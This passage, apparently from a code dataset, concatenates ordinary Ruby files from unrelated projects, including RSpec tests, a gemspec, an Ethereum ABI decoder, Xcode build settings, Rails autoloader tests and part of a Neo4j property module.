# one helper with overridable keyword defaults, so each example only spells
# out what it is actually about.
RSpec.describe Pricing do
  # Builds a Pricing with sensible defaults; override only what matters.
  def build_pricing(id: "tier1", price: 49, range: 1..4, title: "Chihuahua")
    Pricing.new(id: id, price: price, range: range, title: title)
  end

  describe ".all" do
    it "returns all of the pricings" do
      pricings = Pricing.all

      expect(pricings.count).to eq 4
      [
        [0, "basic", 0, "Hound"],
        [4, "tier1", 49, "Chihuahua"],
        [10, "tier2", 99, "Labrador"],
        [30, "tier3", 249, "Great Dane"],
      ].each_with_index do |(allowance, id, price, title), index|
        expect(pricings[index].allowance).to eq allowance
        expect(pricings[index].id).to eq id
        expect(pricings[index].price).to eq price
        expect(pricings[index].title).to eq title
      end
    end
  end

  describe ".find_by" do
    it "returns the pricing where the count is in range" do
      pricing = Pricing.find_by(count: 7)

      expect(pricing.allowance).to eq 10
      expect(pricing.id).to eq "tier2"
      expect(pricing.price).to eq 99
      expect(pricing.title).to eq "Labrador"
    end
  end

  describe "#==" do
    context "when the pricings have the same identifiers" do
      it "returns true" do
        expect(build_pricing).to eq(build_pricing)
      end
    end

    context "when the pricings have different identifiers" do
      it "returns false" do
        expect(build_pricing).to_not eq(build_pricing(id: "tier2"))
      end
    end
  end

  describe "#allowance" do
    it "returns the upper bound of the range" do
      expect(build_pricing(range: 1..4).allowance).to eq 4
    end
  end

  describe "#id" do
    it "returns the initialized identifier" do
      expect(build_pricing(id: "tier1").id).to eq "tier1"
    end
  end

  describe "#open_source?" do
    it "returns true" do
      pricing = build_pricing(id: "basic", price: 0, range: 0..0, title: "Hound")

      expect(pricing).to be_open_source
    end

    context "when the price is positive" do
      it "returns false" do
        expect(build_pricing(price: 49)).to_not be_open_source
      end
    end
  end

  describe "#price" do
    it "returns the initialized price" do
      expect(build_pricing(price: 49).price).to eq 49
    end
  end

  describe "#title" do
    it "returns the initialized title" do
      expect(build_pricing(title: "Chihuahua").title).to eq "Chihuahua"
    end
  end
end
| 23.490909 | 77 | 0.557792 |
380895e6df52167ba62f95a6ecbb2130be64dba1 | 1,525 | require 'cicu'
describe Cicu::Ruleset do
describe "#new" do
it "should raise ArgumentError if rules are invalid" do
expect(proc { Cicu::Ruleset.new("?") }).to raise_exception(ArgumentError)
end
it "should raise TypeError if argument is not a string" do
expect(proc { Cicu::Ruleset.new([123]) }).to raise_exception(TypeError)
end
it "should raise ArgumentError if rules are too long" do
rules = "[normalization on] & " + 100_000.times.map { "a" }.join("<")
expect(proc { Cicu::Ruleset.new(rules) }).to raise_exception(ArgumentError)
end
it "should create a ruleset if rules are not too long" do
ruleset = Cicu::Ruleset.new("[normalization on] & a < a < a < a < a < a")
expect(ruleset.sort_key("123")).to eq("\x14\x16\x18\x01\a\x01\a")
end
it "should create a ruleset" do
ruleset = Cicu::Ruleset.new("[normalization on] & a < b")
expect(ruleset.sort_key("123")).to eq("\x14\x16\x18\x01\a\x01\a")
end
end
describe "#sort_key" do
it "should raise TypeErrorif argument is not a string" do
ruleset = Cicu::Ruleset.new("[normalization on] & b < a < c")
expect(proc { ruleset.sort_key([123]) }).to raise_exception(TypeError)
end
it "should sort any array according to the rukes" do
ary = %w( a b c ba bb bc )
ruleset = Cicu::Ruleset.new("[normalization on] & b < a < c")
sorted_ary = ary.sort_by { |el| ruleset.sort_key(el) }
expect(sorted_ary).to eq(%w( b bb ba bc a c ))
end
end
end | 42.361111 | 81 | 0.638689 |
39e3157ff6ab03125d891f8000a210c05c517307 | 1,279 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
# Gem packaging definition. This file is produced by the AWS SDK code
# generator (see the WARNING header above); changes belong in the generator.
Gem::Specification.new do |spec|
  spec.name = 'aws-sdk-securityhub'
  spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
  spec.summary = 'AWS SDK for Ruby - AWS SecurityHub'
  spec.description = 'Official AWS Ruby gem for AWS SecurityHub. This gem is part of the AWS SDK for Ruby.'
  spec.author = 'Amazon Web Services'
  spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
  spec.license = 'Apache-2.0'
  spec.email = ['[email protected]']
  spec.require_paths = ['lib']
  spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
  spec.metadata = {
    'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-securityhub',
    'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-securityhub/CHANGELOG.md'
  }
  # Runtime dependencies pinned to the versions the generated code targets.
  spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.127.0')
  spec.add_dependency('aws-sigv4', '~> 1.1')
  spec.required_ruby_version = '>= 2.3'
end
| 38.757576 | 115 | 0.668491 |
abff8025c576880bcaa762e196fbf6f3c1256b57 | 3,401 | module Ethereum
class Decoder
def decode(type, value, start = 0)
is_array, arity, array_subtype = Abi::parse_array_type(type)
if is_array && arity
decode_static_array(arity, array_subtype, value, start)
elsif is_array
decode_dynamic_array(array_subtype, value, start)
else
value = value.gsub(/^0x/,'')
core, subtype = Abi::parse_type(type)
method_name = "decode_#{core}".to_sym
self.send(method_name, value, subtype, start)
end
end
def decode_static_array(arity, array_subtype, value, start)
(0..arity-1).map { |i| decode(array_subtype, value, start + i * 64) }
end
def decode_dynamic_array(array_subtype, value, start)
location = decode_uint(value[start..(start+63)]) * 2
size = decode_uint(value[location..location+63])
(0..size-1).map { |i| decode(array_subtype, value, location + (i+1) * 64) }
end
def decode_fixed(value, subtype = "128x128", start = 0)
decode_int(trim(value, start, fixed_bitsize(subtype))).to_f / 2**exponent(subtype)
end
def decode_uint(value, subtype = "256", start = 0)
trim(value, start, bitsize(subtype)).hex
end
def decode_int(value, subtype = "256", start = 0)
raise ArgumentError if value.nil?
size = bitsize(subtype)
value = trim(value, start, size)
(value[0..1] == "ff") ? (value.hex - (2 ** size)) : value.hex
end
def decode_bool(value, _, start)
value = trim(value, start, 4)
return true if value == "1"
return false if value == "0"
raise ArgumentError
end
def decode_address(value, _ = nil, start)
raise ArgumentError if value.size-start < 64
value[start+24..start+63]
end
def decode_bytes(value, subtype, start)
subtype.present? ? decode_static_bytes(value, subtype, start) : decode_dynamic_bytes(value, start)
end
def decode_static_bytes(value, subtype = nil, start = 0)
trim(value, start, subtype.to_i*8).scan(/.{2}/).collect {|x| x.hex}.pack('C*').strip
end
def decode_dynamic_bytes(value, start = 0)
location = decode_uint(value[start..(start+63)]) * 2
size = decode_uint(value[location..location+63]) * 2
value[location+64..location+63+size].scan(/.{2}/).collect {|x| x.hex}.pack('C*')
end
def decode_string(value, _ = nil, start = 0)
decode_dynamic_bytes(value, start).force_encoding('utf-8')
end
def decode_arguments(arguments, data)
data = data.gsub(/^0x/,'')
types = arguments.map { |o| o.type }
types.each.with_index.map { |t , i| decode(t, data, i*64) }
end
def decode_tuple(value, subtype, start)
arr = []
size = value.size
array_items = size / 64
array_items.times do |t|
arr << value[start..start+63]
start = start + 64
end
arr
end
private
def trim(value, start, bitsize = 256)
value[start+63-(bitsize/4-1)..start+63]
end
def bitsize(subtype, default = 256)
subtype.present? ? subtype.to_i : default
end
def fixed_bitsize(subtype = nil)
subtype ||= "128x128"
_, x, n = /(\d+)x(\d+)/.match(subtype).to_a
x.to_i + n.to_i
end
def exponent(subtype, default = 128)
subtype.nil? ? default : /(\d+)x(\d+)/.match(subtype)[2].to_i
end
end
end
| 30.63964 | 104 | 0.610409 |
790417128cb89193e9cc4db580fa95ed64d7985f | 3,495 | module Xcodeproj
class Project
module Object
class XCBuildConfiguration < AbstractPBXObject
COMMON_BUILD_SETTINGS = {
:all => {
'GCC_VERSION' => 'com.apple.compilers.llvm.clang.1_0',
'GCC_PRECOMPILE_PREFIX_HEADER' => 'YES',
'PRODUCT_NAME' => '$(TARGET_NAME)',
'SKIP_INSTALL' => 'YES',
'DSTROOT' => '/tmp/xcodeproj.dst',
'ALWAYS_SEARCH_USER_PATHS' => 'NO',
'GCC_C_LANGUAGE_STANDARD' => 'gnu99',
'INSTALL_PATH' => "$(BUILT_PRODUCTS_DIR)",
'OTHER_LDFLAGS' => '',
'COPY_PHASE_STRIP' => 'YES',
}.freeze,
:debug => {
'GCC_DYNAMIC_NO_PIC' => 'NO',
'GCC_PREPROCESSOR_DEFINITIONS' => ["DEBUG=1", "$(inherited)"],
'GCC_SYMBOLS_PRIVATE_EXTERN' => 'NO',
'GCC_OPTIMIZATION_LEVEL' => '0',
'COPY_PHASE_STRIP' => 'NO',
}.freeze,
:ios => {
'ARCHS' => "$(ARCHS_STANDARD_32_BIT)",
'IPHONEOS_DEPLOYMENT_TARGET' => '4.3',
'PUBLIC_HEADERS_FOLDER_PATH' => "$(TARGET_NAME)",
'SDKROOT' => 'iphoneos',
}.freeze,
:osx => {
'ARCHS' => "$(ARCHS_STANDARD_64_BIT)",
'GCC_ENABLE_OBJC_EXCEPTIONS' => 'YES',
'GCC_VERSION' => 'com.apple.compilers.llvm.clang.1_0',
'MACOSX_DEPLOYMENT_TARGET' => '10.7',
'SDKROOT' => 'macosx',
}.freeze,
[:osx, :debug] => {
'ONLY_ACTIVE_ARCH' => 'YES',
}.freeze,
[:osx, :release] => {
'DEBUG_INFORMATION_FORMAT' => 'dwarf-with-dsym',
}.freeze,
[:ios, :release] => {
'VALIDATE_PRODUCT' => 'YES',
}.freeze,
}.freeze
def self.new_release(project)
new(project, nil,
'name' => 'Release',
'buildSettings' => COMMON_BUILD_SETTINGS[:all].dup
)
end
def self.new_debug(project)
new(project, nil,
'name' => 'Debug',
'buildSettings' => COMMON_BUILD_SETTINGS[:all].merge(COMMON_BUILD_SETTINGS[:debug])
)
end
# [Hash] the build settings used when building a target
attribute :build_settings
# TODO why do I need to specify the uuid here?
has_one :base_configuration, :uuid => :base_configuration_reference
def initialize(*)
super
self.build_settings ||= {}
end
end
class XCConfigurationList < AbstractPBXObject
attribute :default_configuration_is_visible
attribute :default_configuration_name
has_many :build_configurations
def initialize(*)
super
self.build_configuration_references ||= []
end
def build_settings(build_configuration_name)
if config = build_configurations.where(:name => build_configuration_name)
config.build_settings
end
end
end
end
end
end
| 36.030928 | 95 | 0.467525 |
91094a5eada4b41d10467e9fbf4bdf700811399f | 781 | # frozen_string_literal: true
class OrgAdmin::TemplateCustomizationsController < ApplicationController
  include Paginable
  include Versionable

  after_action :verify_authorized

  # POST /org_admin/templates/:id/customize
  #
  # Clones a funder template into the current user's org. On success the
  # user lands on the new customisation; otherwise we flash an explanation
  # and send them back where they came from.
  def create
    @template = Template.find(params[:template_id])
    authorize(@template, :customize?)

    unless @template.customize?(current_user.org)
      flash[:notice] = _("That template is not customizable.")
      return redirect_back(fallback_location: org_admin_templates_path)
    end

    begin
      @customisation = @template.customize!(current_user.org)
      return redirect_to(org_admin_template_path(@customisation))
    rescue ArgumentError
      flash[:alert] = _("Unable to customize that template.")
    end

    redirect_back(fallback_location: org_admin_templates_path)
  end
end
| 27.892857 | 72 | 0.724712 |
61cc50945b2133379191ef560ccf07e03524000a | 9,044 | # frozen_string_literal: true
require 'rails_helper'
# Request specs for the Vet360 email-address endpoints. External Vet360
# traffic is replayed from VCR cassettes; time is frozen so cassette
# timestamps keep matching.
RSpec.describe 'email_address', type: :request do
  include SchemaMatchers
  let(:token) { 'fa0f28d6-224a-4015-a3b0-81e77de269f2' }
  let(:auth_header) { { 'Authorization' => "Token token=#{token}" } }
  let(:user) { build(:user, :loa3) }
  before do
    Timecop.freeze(Time.zone.local(2018, 6, 6, 15, 35, 55))
    Session.create(uuid: user.uuid, token: token)
    User.create(user)
  end
  after do
    Timecop.return
  end
  describe 'POST /v0/profile/email_addresses' do
    let(:email) { build(:email, vet360_id: user.vet360_id) }
    context 'with a 200 response' do
      it 'should match the email address schema', :aggregate_failures do
        VCR.use_cassette('vet360/contact_information/post_email_success') do
          post(
            '/v0/profile/email_addresses',
            { email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
          expect(response).to have_http_status(:ok)
          expect(response).to match_response_schema('vet360/transaction_response')
        end
      end
      it 'creates a new AsyncTransaction::Vet360::EmailTransaction db record' do
        VCR.use_cassette('vet360/contact_information/post_email_success') do
          expect do
            post(
              '/v0/profile/email_addresses',
              { email_address: '[email protected]' }.to_json,
              auth_header.update(
                'Content-Type' => 'application/json', 'Accept' => 'application/json'
              )
            )
          end.to change(AsyncTransaction::Vet360::EmailTransaction, :count).from(0).to(1)
        end
      end
      it 'invalidates the cache for the vet360-contact-info-response Redis key' do
        VCR.use_cassette('vet360/contact_information/post_email_success') do
          expect_any_instance_of(Common::RedisStore).to receive(:destroy)
          post(
            '/v0/profile/email_addresses',
            { email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
        end
      end
    end
    context 'with a 400 response' do
      it 'should match the errors schema', :aggregate_failures do
        VCR.use_cassette('vet360/contact_information/post_email_w_id_error') do
          post(
            '/v0/profile/email_addresses',
            { id: 42, email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
          expect(response).to have_http_status(:bad_request)
          expect(response).to match_response_schema('errors')
        end
      end
      # A failed upstream call must leave the cached contact info intact.
      it 'should not invalidate the cache' do
        VCR.use_cassette('vet360/contact_information/post_email_w_id_error') do
          expect_any_instance_of(Common::RedisStore).to_not receive(:destroy)
          post(
            '/v0/profile/email_addresses',
            { id: 42, email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
        end
      end
    end
    context 'with a 403 response' do
      it 'should return a forbidden response' do
        VCR.use_cassette('vet360/contact_information/post_email_status_403') do
          post(
            '/v0/profile/email_addresses',
            { email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
          expect(response).to have_http_status(:forbidden)
        end
      end
    end
    context 'with a validation issue' do
      # Model validation fails before any upstream call, so no cassette.
      it 'should match the errors schema', :aggregate_failures do
        post(
          '/v0/profile/email_addresses',
          { email_address: '' }.to_json,
          auth_header.update(
            'Content-Type' => 'application/json', 'Accept' => 'application/json'
          )
        )
        expect(response).to have_http_status(:unprocessable_entity)
        expect(response).to match_response_schema('errors')
        expect(errors_for(response)).to include "email-address - can't be blank"
      end
    end
  end
  describe 'PUT /v0/profile/email_addresses' do
    let(:email) { build(:email, vet360_id: user.vet360_id) }
    context 'with a 200 response' do
      it 'should match the email address schema', :aggregate_failures do
        VCR.use_cassette('vet360/contact_information/put_email_success') do
          put(
            '/v0/profile/email_addresses',
            { id: 42, email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
          expect(response).to have_http_status(:ok)
          expect(response).to match_response_schema('vet360/transaction_response')
        end
      end
      it 'creates a new AsyncTransaction::Vet360::EmailTransaction db record' do
        VCR.use_cassette('vet360/contact_information/put_email_success') do
          expect do
            put(
              '/v0/profile/email_addresses',
              { id: 42, email_address: '[email protected]' }.to_json,
              auth_header.update(
                'Content-Type' => 'application/json', 'Accept' => 'application/json'
              )
            )
          end.to change(AsyncTransaction::Vet360::EmailTransaction, :count).from(0).to(1)
        end
      end
      it 'invalidates the cache for the vet360-contact-info-response Redis key' do
        VCR.use_cassette('vet360/contact_information/put_email_success') do
          expect_any_instance_of(Common::RedisStore).to receive(:destroy)
          put(
            '/v0/profile/email_addresses',
            { id: 42, email_address: '[email protected]' }.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
        end
      end
    end
    context 'with a validation issue' do
      it 'should match the errors schema', :aggregate_failures do
        put(
          '/v0/profile/email_addresses',
          { email_address: '' }.to_json,
          auth_header.update(
            'Content-Type' => 'application/json', 'Accept' => 'application/json'
          )
        )
        expect(response).to have_http_status(:unprocessable_entity)
        expect(response).to match_response_schema('errors')
        expect(errors_for(response)).to include "email-address - can't be blank"
      end
    end
    context 'when effective_end_date is included' do
      let(:email) do
        build(:email, vet360_id: '1', email_address: '[email protected]')
      end
      let(:id_in_cassette) { 42 }
      before do
        allow_any_instance_of(User).to receive(:icn).and_return('1234')
        email.id = id_in_cassette
      end
      # VCR::MATCH_EVERYTHING makes the cassette a strict body assertion.
      it 'effective_end_date is NOT included in the request body', :aggregate_failures do
        VCR.use_cassette('vet360/contact_information/put_email_ignore_eed', VCR::MATCH_EVERYTHING) do
          # The cassette we're using includes the effectiveEndDate in the body.
          # So this test will not pass if it's missing
          put(
            '/v0/profile/email_addresses',
            email.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
          expect(response).to have_http_status(:ok)
          expect(response).to match_response_schema('vet360/transaction_response')
        end
      end
    end
  end
  describe 'DELETE /v0/profile/email_addresses' do
    let(:email) do
      build(:email, vet360_id: user.vet360_id, email_address: '[email protected]')
    end
    let(:id_in_cassette) { 42 }
    before do
      allow_any_instance_of(User).to receive(:icn).and_return('64762895576664260')
      email.id = id_in_cassette
    end
    context 'when the method is DELETE' do
      it 'effective_end_date gets appended to the request body', :aggregate_failures do
        VCR.use_cassette('vet360/contact_information/delete_email_success', VCR::MATCH_EVERYTHING) do
          # The cassette we're using includes the effectiveEndDate in the body.
          # So this test will not pass if it's missing
          delete(
            '/v0/profile/email_addresses',
            email.to_json,
            auth_header.update(
              'Content-Type' => 'application/json', 'Accept' => 'application/json'
            )
          )
          expect(response).to have_http_status(:ok)
          expect(response).to match_response_schema('vet360/transaction_response')
        end
      end
    end
  end
end
| 35.190661 | 101 | 0.611345 |
d5c9bc2193c95d4d35bfb6e62477ed668d1f596c | 1,465 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Hdinsight::Mgmt::V2018_06_01_preview
module Models
#
# The information of AAD security group.
#
class ClientGroupInfo
include MsRestAzure
# @return [String] The AAD security group name.
attr_accessor :group_name
# @return [String] The AAD security group id.
attr_accessor :group_id
#
# Mapper for ClientGroupInfo class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ClientGroupInfo',
type: {
name: 'Composite',
class_name: 'ClientGroupInfo',
model_properties: {
group_name: {
client_side_validation: true,
required: false,
serialized_name: 'groupName',
type: {
name: 'String'
}
},
group_id: {
client_side_validation: true,
required: false,
serialized_name: 'groupId',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 25.258621 | 70 | 0.524232 |
ff8c06b479aeaf48c619de6bf8c5e5ba77b48e82 | 9,758 | # frozen_string_literal: true
require "isolation/abstract_unit"
require "active_support/dependencies/zeitwerk_integration"
class ZeitwerkIntegrationTest < ActiveSupport::TestCase
include ActiveSupport::Testing::Isolation
def setup
build_app
end
def boot(env = "development")
app(env)
end
def teardown
teardown_app
end
def deps
ActiveSupport::Dependencies
end
def decorated?
deps.singleton_class < deps::ZeitwerkIntegration::Decorations
end
test "ActiveSupport::Dependencies is decorated by default" do
boot
assert decorated?
assert Rails.autoloaders.zeitwerk_enabled?
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.main
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.once
assert_equal [Rails.autoloaders.main, Rails.autoloaders.once], Rails.autoloaders.to_a
end
test "ActiveSupport::Dependencies is not decorated in classic mode" do
add_to_config "config.autoloader = :classic"
boot
assert_not decorated?
assert_not Rails.autoloaders.zeitwerk_enabled?
assert_nil Rails.autoloaders.main
assert_nil Rails.autoloaders.once
assert_equal 0, Rails.autoloaders.count
end
test "autoloaders inflect with Active Support" do
app_file "config/initializers/inflections.rb", <<-RUBY
ActiveSupport::Inflector.inflections(:en) do |inflect|
inflect.acronym 'RESTful'
end
RUBY
app_file "app/controllers/restful_controller.rb", <<-RUBY
class RESTfulController < ApplicationController
end
RUBY
boot
basename = "restful_controller"
abspath = "#{Rails.root}/app/controllers/#{basename}.rb"
camelized = "RESTfulController"
Rails.autoloaders.each do |autoloader|
assert_equal camelized, autoloader.inflector.camelize(basename, abspath)
end
assert RESTfulController
end
test "constantize returns the value stored in the constant" do
app_file "app/models/admin/user.rb", "class Admin::User; end"
boot
assert_same Admin::User, deps.constantize("Admin::User")
end
test "constantize raises if the constant is unknown" do
boot
assert_raises(NameError) { deps.constantize("Admin") }
end
test "safe_constantize returns the value stored in the constant" do
app_file "app/models/admin/user.rb", "class Admin::User; end"
boot
assert_same Admin::User, deps.safe_constantize("Admin::User")
end
test "safe_constantize returns nil for unknown constants" do
boot
assert_nil deps.safe_constantize("Admin")
end
test "autoloaded? and overridden class names" do
invalid_constant_name = Module.new do
def self.name
"primary::SchemaMigration"
end
end
assert_not deps.autoloaded?(invalid_constant_name)
end
test "unloadable constants (main)" do
app_file "app/models/user.rb", "class User; end"
app_file "app/models/post.rb", "class Post; end"
boot
assert Post
assert deps.autoloaded?("Post")
assert deps.autoloaded?(Post)
assert_not deps.autoloaded?("User")
assert_equal ["Post"], deps.autoloaded_constants
end
test "unloadable constants (once)" do
add_to_config 'config.autoload_once_paths << "#{Rails.root}/extras"'
app_file "extras/foo.rb", "class Foo; end"
app_file "extras/bar.rb", "class Bar; end"
boot
assert Foo
assert_not deps.autoloaded?("Foo")
assert_not deps.autoloaded?(Foo)
assert_not deps.autoloaded?("Bar")
assert_empty deps.autoloaded_constants
end
test "unloadable constants (reloading disabled)" do
app_file "app/models/user.rb", "class User; end"
app_file "app/models/post.rb", "class Post; end"
boot("production")
assert Post
assert_not deps.autoloaded?("Post")
assert_not deps.autoloaded?(Post)
assert_not deps.autoloaded?("User")
assert_empty deps.autoloaded_constants
end
test "eager loading loads the application code" do
$zeitwerk_integration_test_user = false
$zeitwerk_integration_test_post = false
app_file "app/models/user.rb", "class User; end; $zeitwerk_integration_test_user = true"
app_file "app/models/post.rb", "class Post; end; $zeitwerk_integration_test_post = true"
boot("production")
assert $zeitwerk_integration_test_user
assert $zeitwerk_integration_test_post
end
test "reloading is enabled if config.cache_classes is false" do
boot
assert Rails.autoloaders.main.reloading_enabled?
assert_not Rails.autoloaders.once.reloading_enabled?
end
test "reloading is disabled if config.cache_classes is true" do
boot("production")
assert_not Rails.autoloaders.main.reloading_enabled?
assert_not Rails.autoloaders.once.reloading_enabled?
end
test "reloading raises if config.cache_classes is true" do
boot("production")
e = assert_raises(StandardError) do
deps.clear
end
assert_equal "reloading is disabled because config.cache_classes is true", e.message
end
test "eager loading loads code in engines" do
$test_blog_engine_eager_loaded = false
engine("blog") do |bukkit|
bukkit.write("lib/blog.rb", "class BlogEngine < Rails::Engine; end")
bukkit.write("app/models/post.rb", "Post = $test_blog_engine_eager_loaded = true")
end
boot("production")
assert $test_blog_engine_eager_loaded
end
test "eager loading loads anything managed by Zeitwerk" do
$zeitwerk_integration_test_user = false
app_file "app/models/user.rb", "class User; end; $zeitwerk_integration_test_user = true"
$zeitwerk_integration_test_extras = false
app_dir "extras"
app_file "extras/webhook_hacks.rb", "WebhookHacks = 1; $zeitwerk_integration_test_extras = true"
require "zeitwerk"
autoloader = Zeitwerk::Loader.new
autoloader.push_dir("#{app_path}/extras")
autoloader.setup
boot("production")
assert $zeitwerk_integration_test_user
assert $zeitwerk_integration_test_extras
end
test "autoload directories not present in eager load paths are not eager loaded" do
$zeitwerk_integration_test_user = false
app_file "app/models/user.rb", "class User; end; $zeitwerk_integration_test_user = true"
$zeitwerk_integration_test_lib = false
app_dir "lib"
app_file "lib/webhook_hacks.rb", "WebhookHacks = 1; $zeitwerk_integration_test_lib = true"
$zeitwerk_integration_test_extras = false
app_dir "extras"
app_file "extras/websocket_hacks.rb", "WebsocketHacks = 1; $zeitwerk_integration_test_extras = true"
add_to_config "config.autoload_paths << '#{app_path}/lib'"
add_to_config "config.autoload_once_paths << '#{app_path}/extras'"
boot("production")
assert $zeitwerk_integration_test_user
assert_not $zeitwerk_integration_test_lib
assert_not $zeitwerk_integration_test_extras
assert WebhookHacks
assert WebsocketHacks
assert $zeitwerk_integration_test_lib
assert $zeitwerk_integration_test_extras
end
test "autoload_paths are set as root dirs of main, and in the same order" do
boot
existing_autoload_paths = deps.autoload_paths.select { |dir| File.directory?(dir) }
assert_equal existing_autoload_paths, Rails.autoloaders.main.dirs
end
test "autoload_once_paths go to the once autoloader, and in the same order" do
extras = %w(e1 e2 e3)
extras.each do |extra|
app_dir extra
add_to_config %(config.autoload_once_paths << "\#{Rails.root}/#{extra}")
end
boot
extras = extras.map { |extra| "#{app_path}/#{extra}" }
extras.each do |extra|
assert_not_includes Rails.autoloaders.main.dirs, extra
end
assert_equal extras, Rails.autoloaders.once.dirs
end
test "clear reloads the main autoloader, and does not reload the once one" do
boot
$zeitwerk_integration_reload_test = []
main_autoloader = Rails.autoloaders.main
def main_autoloader.reload
$zeitwerk_integration_reload_test << :main_autoloader
super
end
once_autoloader = Rails.autoloaders.once
def once_autoloader.reload
$zeitwerk_integration_reload_test << :once_autoloader
super
end
ActiveSupport::Dependencies.clear
assert_equal %i(main_autoloader), $zeitwerk_integration_reload_test
end
test "verbose = true sets the dependencies logger if present" do
boot
logger = Logger.new(File::NULL)
ActiveSupport::Dependencies.logger = logger
ActiveSupport::Dependencies.verbose = true
Rails.autoloaders.each do |autoloader|
assert_same logger, autoloader.logger
end
end
test "verbose = true sets the Rails logger as fallback" do
boot
ActiveSupport::Dependencies.verbose = true
Rails.autoloaders.each do |autoloader|
assert_same Rails.logger, autoloader.logger
end
end
test "verbose = false sets loggers to nil" do
boot
ActiveSupport::Dependencies.verbose = true
Rails.autoloaders.each do |autoloader|
assert autoloader.logger
end
ActiveSupport::Dependencies.verbose = false
Rails.autoloaders.each do |autoloader|
assert_nil autoloader.logger
end
end
test "unhooks" do
boot
assert_equal Module, Module.method(:const_missing).owner
assert_equal :no_op, deps.unhook!
end
test "autoloaders.logger=" do
boot
logger = ->(_msg) { }
Rails.autoloaders.logger = logger
Rails.autoloaders.each do |autoloader|
assert_same logger, autoloader.logger
end
Rails.autoloaders.logger = Rails.logger
Rails.autoloaders.each do |autoloader|
assert_same Rails.logger, autoloader.logger
end
Rails.autoloaders.logger = nil
Rails.autoloaders.each do |autoloader|
assert_nil autoloader.logger
end
end
end
| 27.105556 | 104 | 0.723919 |
0334d87655c76710533927d4b2e83155c6dd718e | 628 | # frozen_string_literal: true
class ActiveRecordDoctor::Detectors::UnindexedForeignKeysTest < Minitest::Test
def test_unindexed_foreign_key_is_reported
create_table(:companies)
create_table(:users) do |t|
t.references :company, foreign_key: true, index: false
end
assert_success(<<OUTPUT)
The following foreign keys should be indexed for performance reasons:
users company_id
OUTPUT
end
def test_indexed_foreign_key_is_not_reported
create_table(:companies)
create_table(:users) do |t|
t.references :company, foreign_key: true, index: true
end
assert_success("")
end
end
| 25.12 | 78 | 0.753185 |
bf13ca4a74d8380e78bb6bbee47454f5f4f25adc | 8,677 | module Neo4j::Shared
module Property
extend ActiveSupport::Concern
include Neo4j::Shared::MassAssignment
include Neo4j::Shared::TypecastedAttributes
include ActiveModel::Dirty
class UndefinedPropertyError < Neo4j::Error; end
class MultiparameterAssignmentError < Neo4j::Error; end
attr_reader :_persisted_obj
def inspect
attribute_descriptions = inspect_attributes.map do |key, value|
"#{Neo4j::ANSI::CYAN}#{key}: #{Neo4j::ANSI::CLEAR}#{value.inspect}"
end.join(', ')
separator = ' ' unless attribute_descriptions.empty?
"#<#{Neo4j::ANSI::YELLOW}#{self.class.name}#{Neo4j::ANSI::CLEAR}#{separator}#{attribute_descriptions}>"
end
def initialize(attributes = nil)
attributes = process_attributes(attributes)
modded_attributes = inject_defaults!(attributes)
validate_attributes!(modded_attributes)
writer_method_props = extract_writer_methods!(modded_attributes)
send_props(writer_method_props)
self.undeclared_properties = attributes
@_persisted_obj = nil
end
def undeclared_properties=(_); end
def inject_defaults!(starting_props)
return starting_props if self.class.declared_properties.declared_property_defaults.empty?
self.class.declared_properties.inject_defaults!(self, starting_props || {})
end
def read_attribute(name)
respond_to?(name) ? send(name) : nil
end
alias [] read_attribute
def send_props(hash)
return hash if hash.blank?
hash.each { |key, value| send("#{key}=", value) }
end
def reload_properties!(properties)
@attributes = nil
convert_and_assign_attributes(properties)
end
private
# Changes attributes hash to remove relationship keys
# Raises an error if there are any keys left which haven't been defined as properties on the model
# TODO: use declared_properties instead of self.attributes
def validate_attributes!(attributes)
return attributes if attributes.blank?
invalid_properties = attributes.keys.map(&:to_s) - self.attributes.keys
invalid_properties.reject! { |name| self.respond_to?("#{name}=") }
fail UndefinedPropertyError, "Undefined properties: #{invalid_properties.join(',')}" if !invalid_properties.empty?
end
def extract_writer_methods!(attributes)
return attributes if attributes.blank?
{}.tap do |writer_method_props|
attributes.each_key do |key|
writer_method_props[key] = attributes.delete(key) if self.respond_to?("#{key}=")
end
end
end
DATE_KEY_REGEX = /\A([^\(]+)\((\d+)([if])\)$/
# Gives support for Rails date_select, datetime_select, time_select helpers.
def process_attributes(attributes = nil)
return attributes if attributes.blank?
multi_parameter_attributes = {}
new_attributes = {}
attributes.each_pair do |key, value|
if key.match(DATE_KEY_REGEX)
match = key.to_s.match(DATE_KEY_REGEX)
found_key = match[1]
index = match[2].to_i
(multi_parameter_attributes[found_key] ||= {})[index] = value.empty? ? nil : value.send("to_#{$3}")
else
new_attributes[key] = value
end
end
multi_parameter_attributes.empty? ? new_attributes : process_multiparameter_attributes(multi_parameter_attributes, new_attributes)
end
